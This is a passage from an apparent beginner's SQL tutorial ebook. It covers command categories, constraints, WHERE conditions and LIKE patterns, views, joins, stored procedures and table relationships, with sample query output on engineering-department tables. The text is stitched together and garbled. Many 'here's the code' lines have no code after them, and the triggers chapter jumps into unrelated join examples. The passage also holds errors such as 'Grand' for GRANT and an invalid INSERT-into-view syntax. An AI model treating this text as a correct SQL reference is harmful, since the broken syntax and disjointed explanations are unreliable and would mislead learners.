you have.
SQL can store the data that you collect.
SQL can look at your database and retrieves the information on
there.
SQL allows you to modify data.
SQL can take some of the structures in your database and
change them up.
SQL allows you to combine data.
SQL allows you to perform calculations.
SQL allows data protection.
Traditionally, many companies would choose to work with the ‘Database
Management System,’ or the DBMS to help them to keep organized and to
keep track of their customers and their products. This was the first option that
was on the market for this kind of organization, and it does work well. But
over the years there have been some newer methods that have changed the
way that companies can sort and hold their information. Even when it comes
to the most basic management system for data that you can choose, you will
see that there is a ton more power and security than you would have found in
the past.
Big companies will be responsible for holding onto a lot of data, and some of
this data will include personal information about their customers like address,
names, and credit card information. Because of the more complex sort of
information that these businesses need to store, a new ‘Relational Database
Management System’ has been created to help keep this information safe in a
way that the DBMS has not been able to.
Now, as a business owner, there are some different options that you can pick
from when you want to get a good database management system. Most
business owners like to go with SQL because it is one of the best options out
there. The SQL language is easy to use, was designed to work well with
businesses, and it will give you all the tools that you need to make sure that
your information is safe. Let’s take some more time to look at this SQL and
learn how to make it work for your business.
How this works with your database
If you decide that SQL is the language that you will work on for managing
your database, you can take a look at the database. You will notice that when
you look at this, you are basically just looking at groups of information.
Some people will consider these to be organizational mechanisms that will be
used to store information that you, as the user, can look at later on, and it can
do this as effectively as possible. There are a ton of things that SQL can help
you with when it comes to managing your database, and you will see some
great results.
There are times when you are working on a project with your company, and
you may be working with some kind of database that is very similar to SQL,
and you may not even realize that you are doing this. For example, one
database that you commonly use is the phone book. This will contain a ton of
information about people in your area including their name, what business
they are in, their address, and their phone numbers. And all this information
is found in one place so you won't have to search all over to find it.
This is kind of how the SQL database works as well. It will do this by
looking through the information that you have available through your
company database. It will sort through that information so that you are better
able to find what you need the most without making a mess or wasting time.
Relational databases
First, we need to take a look at the relational databases. This database is the
one that you will want to use when you want to work with databases that are
aggregated into logical units or other types of tables, and then these tables
have the ability to be interconnected inside of your database in a way that will
make sense depending on what you are looking for at the time. These
databases can also be good to use if you want to take in some complex
information, and then get the program to break it down into some smaller
pieces so that you can manage it a little bit better.
The relational databases are good ones to work with because they allow you
to grab on to all the information that you have stored for your business, and
then manipulate it in a way that makes it easier to use. You can take that
complex information and then break it up into a way that you and others are
more likely to understand. While you might be confused by all the
information and how to break it all up, the system would be able to go
through this and sort it the way that you need in no time. You are also able to
get some more security so that if you place personal information about the
customer into that database, you can keep it away from others, in other
words, it will be kept completely safe from people who would want to steal
it.
Client and server technology
In the past, if you were working with a computer for your business, you were
most likely using a mainframe computer. What this means is that the
machines were able to hold onto a large system, and this system would be
good at storing all the information that you need and for processing options.
Now, these systems were able to work, and they got the job done for a very
long time. If your company uses these and this is what you are most
comfortable with using, it does get the work done. But there are some options
on the market that will do a better job. These options can be found in the
client-server system.
These systems will use some different processes to help you to get the results
that are needed. With this one, the main computer that you are using, which
would be called the ‘server,’ will be accessible to any user who is on the
network. Now, these users must have the right credentials to do this, which
helps to keep the system safe and secure. But if the user has the right
information and is on your network, they can reach the information without a
lot of trouble and barely any effort. The user can get the server from other
servers or from their desktop computer, and the user will then be known as
the ‘client’ so that the client and server are easily able to interact through this
database.
Now, before we are able to get too far into some of the codings that we are
able to do with this kind of language, one of the first things that we need to
learn a bit more about is some of the basic commands that come with this
language, and how each of them is going to work. You will find that when
you know some of the commands that come with any language, but
especially with the SQL language, it will ensure that everything within the
database is going to work the way that you would like.
As we go through this, you will find that the commands in SQL, just like the
commands in any other language, are going to vary. Some are going to be
easier to work with and some are going to be more of a challenge. But all of
them are going to come into use when you would like to create some of your
own queries and more in this language as well so it is worth our time to learn
how this works.
When it comes to learning some of the basic commands that are available in
SQL, you will be able to divide them into six categories and these are all
going to be based on what you will be able to use them for within the system.
Below are the six different categories of commands that you can use inside of
SQL and they include the following.
Data Definition Language
The data definition language, or DDL, is an aspect inside of SQL that will
allow you to generate objects in the database before arranging them the way
that you would like. For example, you will be able to use this aspect of the
system in order to add or delete objects in the database table. Some of the
commands that you will be able to use with the DDL category include:
Drop table
Create a table
Alter table
Create an index
Alter index
Drop index
Drop view
Data Manipulation Language
The idea of a DML, or data manipulation language, is one of the aspects of
SQL that you will be able to use to help modify a bit of the information that
is out there about objects that are inside of your database. This is going to
make it so much easier to delete the objects, update the objects, or even to
allow for something new to be inserted inside of the database that you are
working with. You will find that this is one of the best ways to make sure that
you add in some freedom to the work that you are doing, and will ensure that
you are able to change up the information that is already there rather than
adding to something new.
Data Query Language
Along with the same kinds of lines and thoughts here are the DQL or the data
query language. This one is going to be kind of fun to work with because it is
going to be one of the most powerful of the aspects that you are able to do
with the SQL language you have. This is going to be even truer when you
work with a modern database to help you get the work done.
When we work with this one, we will find that there is only really one
command that we are able to choose from, and this is going to be the
SELECT command. You are able to use this command to make sure that all
of your queries are ran in the right way within your relational database. But if
you want to ensure that you are getting results that are more detailed, it is
possible to go through and add in some options or a special clause along with
the SELECT command to make this easier.
Data Control Language
The DCL or the data control language is going to be a command that you are
able to use when you would like to ensure you are maintaining some of the
control that you need over the database, and when you would like to limit
who is allowed to access that particular database, or parts of the database, at a
given time. You will also find that the DCL idea is going to be used in a few
situations to help generate the objects of the database related to who is going
to have the necessary access to see the information that is found on that
database.
This could include those who will have the right to distribute the necessary
privileges of access when it comes to this data. This can be a good thing in
order to use your business is dealing with a lot of sensitive information and
you only want a few people to get ahold of it all the time. Some of the
different commands that you may find useful to use when working with the
DCL commands are going to include:
Revoke
Create synonym
Alter password
Grand
Data Administration Commands
When you choose to work with these commands, you will be able to analyze
and also audit the operation that is in the database. In some instances, you
will be able to assess the overall performance with the help of these
commands. This is what makes these good commands to choose when you
want to fix some of the bugs that are on the system and you want to get rid of
them so that the database will continue to work properly. Some of the most
common commands that are used for this type include:
Start audit
Stop audit
One thing to keep in mind with the database administration and the data
administration are basically different things when you are on SQL. The
database administration is going to be in charge of managing all of the
databases, including the commands that you set out in SQL. This one is also a
bit more specific to implementing SQL as well.
FOREIGN Key
A foreign key constraint is used to associate a table with another table. Also
known as referencing key, the foreign key is commonly used when you’re
working on parent and child tables. In this type of table relationship, a key in
the child table points to a primary key in the parent table.
A foreign key may consist of one or several columns containing values that
match the primary key in another table. It is commonly used to ensure
referential integrity within the database.
NOT NULL
A column contains NULL VALUES by default. To prevent NULL values
from populating the table’s column, you can implement a NOT NULL
constraint on the column. Bear in mind that the word NULL pertains to
unknown data and not zero data.
To illustrate, the following code creates the table STUDENTS and defines six
columns:
You can also use the ALTER TABLE statement to add a UNIQUE constraint
to an existing table. Here’s the code:
You may also add constraint to more than one column by using ALTER
TABLE with ADD CONSTRAINT:
DEFAULT Constraint
The DEFAULT constraint is used to provide a default value whenever the
user fails to enter a value for a column during an INSERT INTO operation.
To demonstrate, the following code will create a table named EMPLOYEES
with five columns. Notice that the SALARY column takes a default value
(4000.00) which will be used if no value was provided when you add new
records:
You may also use the ALTER STATEMENT to add a DEFAULT constraint
to an existing table:
CHECK Constraint
A CHECK constraint is used to ensure that each value entered in a column
satisfies a given condition. An attempt to enter a non-matching data will
result to a violation of the CHECK constraint which will cause the data to be
rejected.
For example, the code below will create a table named GAMERS with five
columns. It will place a CHECK constraint on the AGE column to ensure that
there will be no gamers under 13 years old on the table.
You can also use the ALTER TABLE statement with MODIFY to add the
CHECK constraint to an existing table:
INDEX Constraint
The INDEX constraint lets you build and access information quickly from a
database. You can easily create an index with one or more table columns.
After the INDEX is created, SQL assigns a ROWID to each row prior to
sorting. Proper indexing can enhance the performance and efficiency of large
databases.
Here’s the syntax:
For instance, if you need to search for a group of employees from a specific
location in the EMPLOYEES table, you can create an INDEX on the column
LOCATION.
Here’s the code:
Example:
Truncate Table Employee;
Output:
Command(s) completed successfully.
Now, if you select the records of Employee table, you will find out that it’s
empty and the records that you inserted earlier are not there anymore. If you
want to drop the table and its data, use the Drop command.
Example:
Drop Table Employee;
Output:
Command(s) completed successfully.
After the successful execution of drop command, the Employee table will be
deleted.
There exists three relationship types between tables. A one-to-one
relationship between two tables means that a single record from table A will
only be associated to a single row in table B. A one-to-many relationship
suggests that a single record from table A will be related to more than one
record present in table B. For example, a single employee, Aaron, could serve
more than one customer, hence a one-to-many relationship exists between
employees and customers. In a many-to-many relationship, multiple rows
from table A can be associated with multiple rows of table B. For example, a
course can have many registered students and many students could have
registered more than one course. The list of examples goes on and on. It will
be a good exercise for you to come up with at least five examples for each
relationship type.
Chapter 9 Defining Your Condition
There is no doubt that a data server can handle many complications, provided
everything is defined clearly. Conditions are defined with the help of
expressions, which may consist of numbers, strings, in built functions, sub
queries, etc. Furthermore, conditions are always defined with the help of
operators which may be comparison operators(=, !=, <,>,<>, Like,IN,
BETWEEN, etc) or arithmetic operators(+, -,*,/); All these things are used
together to form a condition. Now let’s move onto Condition Types.
Types of Conditions
In order to remove unwanted data from our search, we can use these
conditions. Let’s have a look at some of these condition types.
Equality Condition
Conditions that use the equal sign ‘=’ to equate one condition to another are
referred to as equality conditions. You have used this condition many times at
this point.
If we want to know the name of the HOD for Genetic Engineering
department, we would do the following:
(1) First go to ENGINEERING_STUDENTS table and find the ENGG_ID
for ENGG_NAME ‘Genetic’,
SELECT ENGG_ID FROM ENGINEERING_STUDENTS WHERE
ENGG_NAME ='Genetic';
+ - - - - - - - -+
| ENGG_ID |
+ - - - - - - - -+
| 3 |
+ - - - - - - - -+
(2) Then go to Dept_Data table and find the value in HOD column for
ENGG_ID = 3.
SELECT HOD FROM DEPT_DATA where ENGG_ID='3';
+---------+
| HOD |
+---------+
| Victoria Fox |
+---------+
In the first step, we equated the value of column ENGG_NAME to the string
value of ‘Genetic’.
SELECT e. ENGG_NAME ,e.STUDENT_STRENGTH,
d.HOD,d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME = 'Genetic';
+-----------+------------------+--------+-----------
-+
| ENGG_NAME | STUDENT_STRENGTH | HOD |
NO_OF_Prof |
+-----------+------------------+--------+-----------
-+
| Genetic | 75 | Victoria Fox |
7 |
+-----------+------------------+--------+-----------
-+
In the above query, we have all the information in one result set by using an
INNER JOIN and using equality condition twice.
Inequality Condition
The inequality condition is the opposite of equality condition and is
expressed by ‘!=’ and the ‘<>’ symbol.
SELECT e. ENGG_NAME ,e.STUDENT_STRENGTH,
d.HOD,d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME <> 'Genetic';
+--------------+--------------------+-----------+---
------+
ENGG_NAME | STUDENT_STRENGTH | HOD |
NO_OF_Prof |
+--------------+--------------------+-----------+---
------+
| Electronics | 150 | Miley Andrews |
7 |
| Software | 250 | Alex Dawson |
6 |
| Mechanical | 150 | Anne
Joseph |5 |
| Biomedical | 72 | Sophia Williams |
8 |
| Instrumentation | 80 | Olive Brown |
4 |
| Chemical | 75 | Joshua Taylor |
6 |
| Civil | 60 | Ethan Thomas |
5 |
| Electronics & Com | 250 | Michael Anderson |
8 |
| Electrical | 60 | Martin Jones |
5 |
+--------------+--------------------+-----------+---
------+
The statement is the same as saying:
SELECT e. ENGG_NAME ,e.STUDENT_STRENGTH,
d.HOD,d.NO_OF_Prof
FROM ENGINEERING_STUDENTS e INNER JOIN DEPT_DATA d
ON e.ENGG_ID = d.ENGG_ID
WHERE e.ENGG_NAME != 'Genetic';
If you execute the above statement on the command window, you will
receive the same result set.
Using the equality condition to modify data
Suppose the institute decides to close the Genetic Department; in that case, it
is important to delete the records from the database as well.
First, find out what is the ENGG_ID for ‘Genetic’ so that
SELECT * FROM ENGINEERING_STUDENTS WHERE
ENGG_NAME='Genetic';
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
| 3 | Genetic | 75 |
+ - - - - - - - - - + - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
Now from DEPT_DATA we will DELETE the row having ENGG_ID =’3’
DELETE FROM DEPT_DATA WHERE ENGG_ID ='3';
Next, we need to check if the data has been actually deleted or not:
SELECT * FROM DEPT_DATA;
+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
| 100 | Miley Andrews | 7 | 1|
| 101 | Alex Dawson |6 | 2|
| 103 | Anne Joseph |5 | 4|
| 104 | Sophia Williams |8 | 5|
| 105 | Olive Brown |4 | 6|
| 106 | Joshua Taylor |6 | 7|
| 107 | Ethan Thomas |5 | 8|
| 108 | Michael Anderson | 8 | 9|
| 109 | Martin Jones |5 | 10 |
+ - - - - - -+ - - - - - - - - - - - -+ - - - - - - - - - + - - - - - - - -+
Then delete the row from ENGINEERING_STUDENTS where the
ENGG_ID is 3.
DELETE FROM ENGINEERING_STUDENTS WHERE ENGG_ID='3';
Lastly, check if the row has been deleted from
ENGINEERING_STUDENTS:
SELECT * FROM ENGINEERING_STUDENTS;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 5 | Biomedical | 72 |
| 6 | Instrumentation | 80 |
| 7 | Chemical | 75 |
| 8 | Civil | 60 |
| 9 | Electronics & Com | 250 |
| 10 | Electrical | 60 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - - +
Note the records have been successfully deleted from both areas.
Same way the equality condition can be used to update data as well.
Conditions used to define range
We have seen examples of range previously, but we will delve a little deeper
to solidify that knowledge . We want to write queries to define a range to
ensure our expression is within the desired range.
SELECT * FROM ENGINEERING_STUDENTS WHERE
STUDENT_STRENGTH>175
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 2 | Software | 250 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Have a look at another simple example:
SELECT * FROM ENGINEERING_STUDENTS WHERE
300>STUDENT_STRENGTH AND STUDENT_STRENGTH>78;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Next, we will define the same query using the BETWEEN operator. While
defining a range using the BETWEEN operator, specify the lesser value first
and the higher value later.
SELECT * FROM ENGINEERING_STUDENTS WHERE
STUDENT_STRENGTH BETWEEN 78 AND 300;
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
| 1 | Electronics | 150 |
| 2 | Software | 250 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
| 9 | Electronics & Com | 250 |
+ - - - - - - - + - - - - - - - - - - - - - -+ - - - - - - - - - - - - - - - - - -+
Membership Conditions
Sometimes the requirement is not looking for values in a range, but in a set of
certain values. To give you a better idea, suppose that you need to find the
details for ‘Electronics’, ‘Instrumentation’ and ‘Mechanical’:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
= 'Electronics' OR ENGG_NAME = 'Mechanical' OR ENGG_NAME =
'Instrumentation';
+---------+-------------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-------------+------------------+
| 1 | Electronics | 150 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
+---------+-------------+------------------+
We can simplify the above query and get the right result sets using the IN
operator:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
IN ('Electronics', 'Instrumentation', 'Mechanical');
+---------+-------------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-------------+------------------+
| 1 | Electronics | 150 |
| 4 | Mechanical | 150 |
| 6 | Instrumentation | 80 |
+---------+-------------+------------------+
it is the same way if you want to find the data for Engineering fields other
than ‘Electronics’, ‘Mechanical’ and ‘Instrumentation’ use the NOT IN
operator as shown below:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
NOT IN ('Electronics', 'Instrumentation', 'Mechanical');
+---------+-------------+------------------+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+---------+-------------+------------------+
| 2 | Software | 250 |
| 5 | Biomedical | 72 |
| 7 | Chemical | 75 |
| 8 | Civil | 60 |
| 9 | Electronics & Com | 250 |
| 10 | Electrical | 60 |
+---------+-------------+------------------+
Matching Conditions
Suppose you meet all the HOD of the college in a meeting and you are very
impressed by one HOD, but you only remember the name starts with ‘S’.
You can use the following query to find the right person:
SELECT * FROM DEPT_DATA WHERE LEFT(HOD,1)='S';
Here we are using a function left(). It has two parameters: The first value is a
String, which is from the extracted resulted. Here, we will look in the
column_name HOD. The second value determines how many characters
should be extracted from the left.
In this case, we remember the name starts with ‘S’ so we are just going to
extract the first letter of each name in the HOD column to check if it matches
‘S’. The result is as shown below:
+------+-----------+---------+---------+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+------+-----------+---------+---------+
| 104 | Sophia Williams | 8 | 5|
+------+-----------+---------+---------+
One more demonstration to help reinforce the concept:
Suppose you want to look for people having the names starting with ‘Mi’:
SELECT * FROM DEPT_DATA WHERE LEFT(HOD,2)='Mi';
+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+
| 100 | Miley Andrews |7 | 1|
| 108 | Michael Anderson | 8 | 9|
+- - - - - - - - + - - - - - - - - - - - - - + - - - - - - - - - + - - - - - - - -+
Pattern Matching
Pattern matching in another interesting feature you will enjoy, and will use
often as a developer. The concept is simple; It allows you to use an
underscore ( _ ) to match any single character and percentage sign(%) to
match 0, 1, or more characters. Before moving ahead, know that two
comparison operators: LIKE and NOT LIKE, are used in pattern matching.
Now onto the exercises:
Here is the same example where we want to find out the HOD with a name
starting with ‘S’.
SELECT * FROM DEPT_DATA WHERE HOD LIKE 'S%';
+------+-----------+---------+---------+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+------+-----------+---------+---------+
| 104 | Sophia Williams | 8 | 5|
+------+-----------+---------+---------+
Now, let’s look for HOD having name ending with ‘ws’:
SELECT * FROM DEPT_DATA WHERE HOD LIKE '%ws';
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
| 100 | Miley Andrews | 7 | 1|
+ - - - - - -+ - - - - - - - - - - + - - - - - - - - - -+ - - - - - - - -+
Let’s see if we can find a name containing the string ‘cha’.
SELECT * FROM DEPT_DATA WHERE HOD LIKE '%cha%';
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
| Dept_ID | HOD | NO_OF_Prof | ENGG_ID |
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
| 108 | Michael Anderson | 8 | 9|
+ - - - - - -+ - - - - - - - - - - - - -+ - - - - - - - - - -+ - - - - - - - -+
The next example shows how to look for a five letter word with ‘i’ being the
second letter of the word:
SELECT * FROM ENGINEERING_STUDENTS WHERE ENGG_NAME
LIKE '_i___';
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
| ENGG_ID | ENGG_NAME | STUDENT_STRENGTH |
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
| 8 | Civil | 60 |
+ - - - - - - - - -+ - - - - - - - - - - - + - - - - - - - - - - - - - - - - - -+
Regular Expressions
To add more flexibility to your search operations, you can make use of
Regular expressions. It is a vast topic, so here are a few tips to make you
comfortable when utilizing regular expressions:
Based on the table above, you may want to create a view of the customers’
name and the City only. This is how you should write your statement.
Example: CREATE VIEW EmployeesSalary_VIEW AS
SELECT Names, City
FROM EmployeesSalary;
From the resulting VIEW table, you can now create a query such as the
statement below.
SELECT * FROM EmployeesSalary_VIEW;
This SQL query will display a table that will appear this way:
EmployeesSalary
Names City
Williams, Michael Casper
Colton, Jean San Diego
Anderson, Ted Laramie
Dixon, Allan Chicago
Clarkson, Tim New York
Alaina, Ann Ottawa
Rogers, David San Francisco
Lambert, Jancy Los Angeles
Kennedy, Tom Denver
Schultz, Diana New York
INSERTING ROWS
Creating an SQL in INSERTING ROWS is similar to the UPDATING
VIEWS syntax. Make sure you have included the NOT NULL columns.
Example: INSERT INTO “table_name”_VIEWS “column_name1”
WHERE value1;
VIEWS can be utterly useful, if you utilize them appropriately.
To date in this EBook tables have been used to represent data and
information. Views are like virtual tables but they don’t hold any data and
their contents are defined by a query. One of the biggest advantages of a
View is that it can be used as a security measure by restricting access to
certain columns or rows. Also, you can use views to return a selective
amount of data instead of detailed data. A view protects the data layer while
allowing access to the necessary data. A view differs to that of a stored
procedure in that it doesn’t use parameters to carry out a function.
Encrypting the View
You can create a view without columns which contain sensitive data and thus
hide data you don’t want to share. You can also encrypt the view definition
which returns data of a privileged nature. Not only are you restricting certain
columns in a view you are also restricting who has access to the view.
However, once you encrypt a view it is difficult to get back to the original
view detail. Best approach is to make a backup of the original view.
Creating a view
To create a view in SSMS expand the database you are working on, right
click on Views and select New View. The View Designer will appear
showing all the tables that you can add. Add the tables you want in the
View. Now select which columns you want in the View. You can now
change the sort type for each column from ascending to descending and can
also give column names aliases. On the right side of sort type there is Filter.
Filter restricts what a user can and cannot see. Once you set a filter (e.g.
sales > 1000) a user cannot retrieve more information than this view allows.
In the T-SQL code there is a line stating TOP (100) PERCENT which is the
default. You can remove it (also remove the order by statement) or change
the value. Once you have made the changes save the view with the save
button and start the view with vw_ syntax. You can view the contents of the
view if you refresh the database, open views, right click on the view and
select top 1000 rows.
Indexing a view
You can index a view just like you can index a table. The rules are very
similar. When you build a view the first index needs to be a unique clustered
index. Subsequent non clustered indexes can then be created. You need to
have the following set to on, and one off:
SET ANSI_NULLS ON
SET ANSI_PADDING ON
SET ANSI_WARNINGS ON
SET CONCAT_NULL_YIELDS_NULL ON
SET ARITHABORT ON
SET QUOTED_IDENTIFIER ON
SET NUMERIC_ROUNDABORT OFF
Now type the following: CREATE UNIQUE CLUSTERED INDEX
_ixCustProduct
ON table.vw_CusProd(col1,col2)
Chapter 11 Triggers
Sometimes a modification to the data in your database will need an automatic
action on data somewhere else, be it in your database, another database or
within SQL Server. A trigger is an object that will do it. A trigger in SQL
Server is essentially a Stored Procedure which will run performing the action
you want to achieve. Triggers are mostly used to ensure the business logic is
being adhered to in the database, performing cascading data modifications
(i.e. change on one table will result in changes in other tables) and keeping
track of specific changes to a table. SQL Server supports three types of
triggers:
Table B
StudentInformation
StudentNo Year Average
1 1st 90
2 1st 87
3 3rd 88
4 5th 77
5 2nd 93
You may want to extract specified data from both tables. Let’s say from table
A, you want to display LastName, FirstName and the City, while from Table
B, you want to display the Average.
You can construct your SQL statement this way:
Example:
SELECT Students.LastName, Students.FirstName,
StudentInformation.Average
FROM Students
INNER JOIN StudentInformation ON Students.StudentNo=
StudentInformation.StudentNo;
This SQL query will display these data on your resulting table:
LastName FirstName Average
Potter Michael 90
Walker Jean 87
Anderson Ted 88
Dixon Allan 77
Cruise Timothy 93
Table B
StudentInformation
StudentNo Year Average
1 1st 90
2 1st 87
3 3rd 88
4 5th 77
5 2nd 93
Making use of this JOIN SQL syntax properly can save time and money. Use
them to your advantage.
Take note that when the WHERE clause is used, the CROSS JOIN becomes
an INNER JOIN.
There is also one way of expressing your CROSS JOIN. The SQL can be
created this way:
Example: SELECT LastName, FirstName, Age, Address, City
FROM Students
CROSS JOIN StudentInformation;
There will be slight variations in the SQL statements of other SQL servers,
but the main syntax is typically basic.
Chapter 13 Stored Procedures and Functions
So far, we have covered how to build queries as single executable lines.
However, you can place a number of lines into what is known as a stored
procedure or function within SQL Server and call them whenever it is
required.
There are a number of benefits to stored procedure and functions not just
code reuse including: better security, reduced development cost, consistent
and safe data, use of modularization and sharing application logic.
Stored procedures and functions are similar in that the both store and run
code but functions are executed within the context of another unit of work.
T-SQL
There are a number of different ways in which you can execute the query.
You can specify Recompile to indicate that the database engine doesn’t cache
this stored procedure so it must be recompiled every time its executed. You
can use the encryption keyword to hide the stored procedure so it’s not
readily readable. The EXECUTE AS Clause identifies the specific security
context under which the procedure will execute, i.e. control which user
account is used to validate the stored procedure.
After you declare the optional parameters you use the mandatory keyword
AS which defines the start of the T-SQL code and finishes with END. You
can use a stored procedure for more than just regular SQL statements like
SELECT, you can return a value which is useful for error checking.
IF ELSE
Often you will use statements in a Stored Procedure which you need a logical
true or false answer before you can proceed to the next statement. The IF
ELSE statement can facilitate. To test for a true or false statement you can
use the >, <, = and NOT along with testing variables. The syntax for the IF
ELSE statement is the following, note there is only one statement allowed
between each IF ELSE:
IF X=Y
Statement when True
ELSE
Statement when False
BEGIN END
If you need to execute more than one statement in the IF or ELSE block, then
you case use the BEGIN END statement. You can put together a series of
statements which will run after each other no matter what tested for previous
to it. The syntax for BEGIN END is the following:
IF X=Y
BEGIN
statement1
statement2
END
WHILE BREAK
When you need to perform a loop around a piece of code X number of times
you can use the WHILE BREAK statement. It will keep looping until you
either break the Boolean test condition or the code hits the BREAK
statement. The first WHILE statement will continue to execute as long as the
Boolean expression returns true. Once its False it triggers the break and the
next statement is executed. You can use the CONTINUE statement which is
optional, it moves the processing right back to the WHILE statement. The
syntax for the WHILE BREAK command is the following:
WHILE booleanExpression
SQL_statement1 | statementBlock1
BREAK
SQL_statement2 | statementBlock2
Continue
SQL_statement3 | statementBlock3
CASE
There are two forms of CASE, you can use the simple form of CASE to
compare one value or scalar expression to a list of possible values and return
a value for the first match - or you can use the searched CASE form when
you need a more flexibility to specify a predicate or mini function as opposed
to an equality comparison. The following code illustrates the simple form:
SELECT column1
CASE expression
WHEN valueMatched THEN
statements to be executed
WHEN valueMatched THEN
statements to be executed
ELSE
statements to catch all other possibilities
END
The following code illustrate the more complex form, it is useful for
computing a value depending on the condition:
SELECT column1
CASE
WHEN valueX_is_matched THEN
resulting_expression1
WHEN valueY_is_matched THEN
resulting_ expression 2
WHEN valueZ_is_matched THEN
resulting_ expression 3
ELSE
statements to catch all other possibilities
END
The CASE statement works like so, each table row is put through each CASE
statement and instead of the column value being returned, the value from the
computation is returned instead.
Functions
As mentioned functions are similar to stored procedures but they differ in that
functions (or User Defined Functions UDF) can execute within another piece
of work – you can use them anywhere you would use a table or column.
They are like methods, small and quick to run. You simply pass it some
information and it returns a result. There are two types of functions, scalar
and table valued. The difference between the two is what you can return
from the function.
Scalar Functions
A scalar function can only return a single value of the type defined in the
RETURN clause. You can use scalar functions anywhere the scalar matches
the same data type as being used in the T-SQL statements. When calling
them, you can omit a number of the functions parameters. You need to
include a return statement if you want the function to complete and return
control to the calling code. The syntax for the scalar function is the
following:
Table-Valued Functions
A table-valued function (TVF) lets you return a table of data rather than the
single value in a scalar function. You can use the table-valued function
anywhere you would normally use a table, usually from the FROM clause in
a query. With table-valued functions it is possible to create reusable code
framework in a database. The syntax of a TVF is the following
Notes on Functions
A function cannot alter any external resource like a table for example. A
function needs to be robust and if there is an error generate inside it either
from invalid data being passed or the logic then it will stop executing and
control will return to the T-SQL which called it.
Chapter 14 Relationships
A database relationship is a means of connecting two tables together based on
a logical link (i.e. they contain related data). Relationships facilitate database
queries to be executed on two or more tables and they also ensure data
integrity.
Types of relationships
There exists three major types in a database:
One is to One
One is to Many
Many is to Many
One is to One
This type of relationship is pretty rare in databases. A row in a given table X
can will have a matching row in another table Y. Equally a row in table Y
can only have a matching row in table X. An example of a one is to one
relationship is one person having one passport.
One is to Many
This is probably one of the most prevalent relationships found in databases.
A row in a given table X will have several other matching rows present in
another table Y, however a row in the same table Y will only have a single
row that it matches in table X. An example is Houses in a street. One street
had multiple houses and a house belongs to one street.
Many is to Many
A row in a given table X will possess several matching rows in another
specified table Y and the vice versa is also true. This type of relationship is
quite frequent where there are zero, one or even many records in the master
table related to zero, one or many records in the child table. An example of
this relationship is a school where teachers teach students. A teacher can
teach many students and each student can be taught by many teachers.
Referential Integrity
When two tables are connected in a database and have the same information,
it is necessary that the data in both the tables is kept consistent, i.e. either the
information in both tables change or neither table changes. This is known as
referential integrity. It is not possible to have referential integrity with tables
that are in separate databases.
When enforcing referential integrity, it isn’t possible to enter a record in a
(address) table which doesn’t exist in the other (customer) linked table (i.e.
the one with the primary key). You need to first create the customer table
and then use its details to create the address table.
Also, you can use what is known as a trigger and stored procedures to enforce
referential integrity as well as using relationships.
Chapter 15 Database Normalization
In this chapter you will learn an in-depth knowledge of normalization
techniques and their importance in enhancing database conceptualization and
design. As such, more efficient databases are created that will provide the
SQL software application an edge in performing effective queries and
